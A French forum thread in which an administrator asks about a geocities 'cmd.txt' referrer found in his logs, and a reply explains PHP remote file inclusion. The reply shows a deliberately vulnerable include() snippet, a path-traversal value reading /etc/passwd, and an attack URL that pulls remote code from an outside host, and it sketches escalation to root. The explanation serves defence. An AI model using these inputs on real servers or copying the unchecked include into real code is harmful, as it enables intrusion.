geocities.com base d'attaque

Le
Pierre
J'ai trouvé une page référente dans mes log
http://www.geocities.com/r00t_exploit/cmd.txt qui permet a priori d'agir sur
le contenu d'un site en passant des commandes en parametre.

Si quelqu'un en sait davantage sur ce sujet, merci de répondre dans le GN

Merci d'avance
Vidéos High-Tech et Jeu Vidéo
Téléchargements
  • Paint.COM est un logiciel d'édition d'images pour le système d'exploitation Windows.
  • Il s'agit d'un widget qui permet d'effectuer une recherche dans la boutique en ligne ...
Vos réponses
Gagnez chaque mois un abonnement Premium avec GNT : Inscrivez-vous !
Trier par : date / pertinence
Xavier Roche
Le #135395
Pierre wrote:
J'ai trouvé une page référente dans mes log
http://www.geocities.com/r00t_exploit/cmd.txt qui permet a priori d'agir sur
le contenu d'un site en passant des commandes en parametre.
Si quelqu'un en sait davantage sur ce sujet, merci de répondre dans le GN


En gros, cela permet d'exploiter les failles d'inclusion dûes à des
scripts mal protégés.

Exemple:
http://www.example.com/page.php?page=sommaire

avec page.php:
<?php
@include($page.".php"); // variable exterieure non vérifiée!
..
?>

Ici premier problème: la variable "page" peut être arbitrairement écrite
par l'utilisateur ; comme par exemple page=../../../../etc/passwd

Le problème additionnel c'est que les opérations comme fopen(),
include() etc. sont en PHP par défaut compatibles avec autre chose que
de la filesystem, et notamment permettent d'utiliser des protocoles
comme HTTP.

Ainsi, en utilisant:
http://www.example.com/page.php?page=http://www.geocities.com/r00t_exploit/cmd.txt
on peut inclure le fichier hébergé sur le site en question.

Le problème, c'est que là on effectue une inclusion de *code*, et plus
simplement d'une page HTML: on peut donc arbitrairement injecter du code
PHP sur un serveur.

En sachant que PHP peut (s'il n'est pas placé en mode "safe") executer
lui même des process sur la machine, comme un inetd(), on peut alors
assez facilement entrer en mode user sur le serveur, et par la suite
escalader en root, ou héberger un compte ftp pirate, envoyer du spam etc.

Publicité
Poster une réponse
Anonyme